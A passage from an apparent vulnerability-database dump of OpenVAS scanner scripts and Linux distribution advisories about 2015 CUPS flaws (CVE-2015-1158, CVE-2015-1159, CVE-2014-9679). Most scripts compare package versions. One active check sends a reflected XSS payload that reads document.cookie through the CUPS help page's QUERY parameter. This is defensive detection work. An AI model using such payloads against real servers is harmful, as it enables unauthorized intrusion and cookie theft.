ELSA-2015-1123\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1123.html\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", 
rpm:\"cups~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-filesystem\", rpm:\"cups-filesystem~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-ipptool\", rpm:\"cups-ipptool~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.6.3~17.el7_1.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.el6_6.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "description": "Check the version of cups", "modified": "2019-03-08T00:00:00", "published": "2015-06-19T00:00:00", "id": "OPENVAS:1361412562310882202", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882202", "type": "openvas", "title": "CentOS Update for cups CESA-2015:1123 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for cups CESA-2015:1123 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882202\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-19 06:18:37 +0200 (Fri, 19 Jun 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for cups CESA-2015:1123 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of cups\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"CUPS provides a portable printing layer\n for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing\nof string objects. An attacker can submit a malicious print job that\nexploits this flaw to dismantle ACLs protecting privileged operations,\nallowing a replacement configuration file to be uploaded which in turn\nallows the attacker to run arbitrary code in the CUPS server\n(CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. 
An\nattacker could use this flaw to bypass the default configuration settings\nthat bind the CUPS scheduler to the 'localhost' or loopback interface.\n(CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in\nthe way cups handled compressed raster image files. An attacker could\ncreate a specially-crafted image file, which when passed via the cups\nRaster filter, could cause the cups filter to crash. (CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and\nCVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"cups on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1123\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-libs\", 
rpm:\"cups-libs~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-lpd\", rpm:\"cups-lpd~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-php\", rpm:\"cups-php~1.4.2~67.el6_6.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869513", "type": "openvas", "title": "Fedora Update for cups FEDORA-2015-9726", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2015-9726\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869513\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:21:21 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for cups FEDORA-2015-9726\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"cups on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9726\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160444.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~2.0.3~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "It was discovered that CUPS, the\nCommon UNIX Printing System, is vulnerable to a remotely triggerable privilege\nescalation via cross-site scripting and bad print job submission used to replace\ncupsd.conf on the CUPS server.", "modified": "2019-03-18T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310703283", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703283", "type": "openvas", "title": "Debian Security Advisory DSA 3283-1 (cups - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3283.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3283-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703283\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_name(\"Debian Security Advisory DSA 3283-1 (cups - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 00:00:00 +0200 (Tue, 09 Jun 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3283.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"cups on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthese problems have been fixed in version 1.5.3-5+deb7u6.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.7.5-11+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.7.5-12.\n\nWe recommend that you upgrade your cups packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that CUPS, the\nCommon UNIX Printing System, is vulnerable to a remotely triggerable 
privilege\nescalation via cross-site scripting and bad print job submission used to replace\ncupsd.conf on the CUPS server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"cups\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcups2:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcups2:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupscgi1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupscgi1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsdriver1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"libcupsdriver1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsimage2:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsimage2:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsmime1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsmime1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsppdc1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsppdc1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:25:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Various versions of CUPS are vulnerable\nto a privilege escalation due to a memory management error.", "modified": "2020-05-08T00:00:00", "published": "2015-06-15T00:00:00", "id": "OPENVAS:1361412562310105298", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105298", "type": "openvas", "title": "CUPS < 2.0.3 Multiple Vulnerabilities", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CUPS < 2.0.3 Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:cups\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105298\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098, 75106);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-05-08T08:34:44+0000\");\n\n script_name(\"CUPS < 2.0.3 Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/810572\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/37336\");\n\n script_tag(name:\"impact\", value:\"CVE-2015-1158 may allow a remote unauthenticated\nattacker access to privileged operations on the CUPS server. 
CVE-2015-1159 may allow\nan attacker to execute arbitrary JavaScript in a user's browser.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends crafted data via an HTTP GET request\nand checks whether it is able to read the cookie or not\");\n\n script_tag(name:\"insight\", value:\"CVE-2015-1158:\nAn issue with how localized strings are handled in cupsd allows a reference\ncounter to over-decrement when handling certain print job request errors. As a\nresult, an attacker can prematurely free an arbitrary string of global scope,\ncreating a dangling pointer to a repurposed block of memory on the heap. The\ndangling pointer causes ACL verification to fail when parsing 'admin/conf' and\n'admin' ACLs. The ACL handling failure results in unrestricted access to\nprivileged operations, allowing an unauthenticated remote user to upload a\nreplacement CUPS configuration file and mount further attacks.\n\nCVE-2015-1159:\nA cross-site scripting bug in the CUPS templating engine allows this bug to be\nexploited when a user browses the web. In certain cases, the CGI template can\necho user input to file rather than escaping the text first. This may be used\nto set up a reflected XSS attack in the QUERY parameter of the web interface\nhelp page. By default, many Linux distributions run with the web interface\nactivated; OS X has the web interface deactivated by default.\");\n\n script_tag(name:\"solution\", value:\"A patch addressing these issues has been\nreleased for all supported versions of CUPS. 
For the version 2.0 branch (the latest\nrelease), 2.0.3 contains the patch.\");\n\n script_tag(name:\"summary\", value:\"Various versions of CUPS are vulnerable\nto a privilege escalation due to a memory management error.\");\n\n script_tag(name:\"affected\", value:\"CUPS < 2.0.3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-06-15 15:24:12 +0200 (Mon, 15 Jun 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_cups_detect.nasl\");\n script_require_ports(\"Services/www\", 631);\n script_mandatory_keys(\"CUPS/installed\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!cupsPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nurl = \"/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28document.cooki\" +\n \"e%29%3C/script%3E%3C!--&SEARCH=Search\";\n\nif(http_vuln_check(port:cupsPort, url:url, pattern:\"script>alert\\(document.cookie\\)</script>\",\n extra_check: make_list(\">Online Help\", \"CUPS\"), check_header:TRUE))\n{\n report = http_report_vuln_url( port:cupsPort, url:url );\n security_message(port:cupsPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Gentoo Linux Local Security Checks GLSA 201510-07", "modified": "2018-10-26T00:00:00", "published": "2015-11-08T00:00:00", "id": "OPENVAS:1361412562310121420", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121420", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201510-07", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201510-07.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121420\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-08 13:04:39 +0200 (Sun, 08 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201510-07\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in cups. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201510-07\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201510-07\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-print/cups\", unaffected: make_list(\"ge 2.0.3\"), vulnerable: make_list(\"lt 2.0.3\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "- CVE-2015-1158 (arbitrary code execution, privilege escalation)\n\nAn issue with how localized strings are handled in cupsd allows a\nreference counter to over-decrement when handling certain print job\nrequest errors. As a result, an attacker can prematurely free an\narbitrary string of global scope, creating a dangling pointer to a\nrepurposed block of memory on the heap. The dangling pointer causes ACL\nverification to fail when parsing 'admin/conf' and 'admin' ACLs. 
The ACL\nhandling failure results in unrestricted access to privileged\noperations, allowing an unauthenticated remote user to upload a\nreplacement CUPS configuration file and mount further attacks.\n\n- CVE-2015-1159 (cross-site scripting)\n\nA cross-site scripting bug in the CUPS templating engine allows this bug\nto be exploited when a user browses the web. In certain cases, the CGI\ntemplate can echo user input to file rather than escaping the text\nfirst. This may be used to set up a reflected XSS attack in the QUERY\nparameter of the web interface help page. By default, many linux\ndistributions run with the web interface activated.", "modified": "2015-06-10T00:00:00", "published": "2015-06-10T00:00:00", "id": "ASA-201506-2", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-June/000343.html", "type": "archlinux", "title": "cups: multiple issues", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2629-1\r\nJune 10, 2015\r\n\r\ncups vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.04\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in CUPS.\r\n\r\nSoftware Description:\r\n- cups: Common UNIX Printing System(tm)\r\n\r\nDetails:\r\n\r\nIt was discovered that CUPS incorrectly handled reference counting when\r\nhandling localized strings. A remote attacker could use this issue to\r\nescalate permissions, upload a replacement CUPS configuration file, and\r\nexecute arbitrary code. 
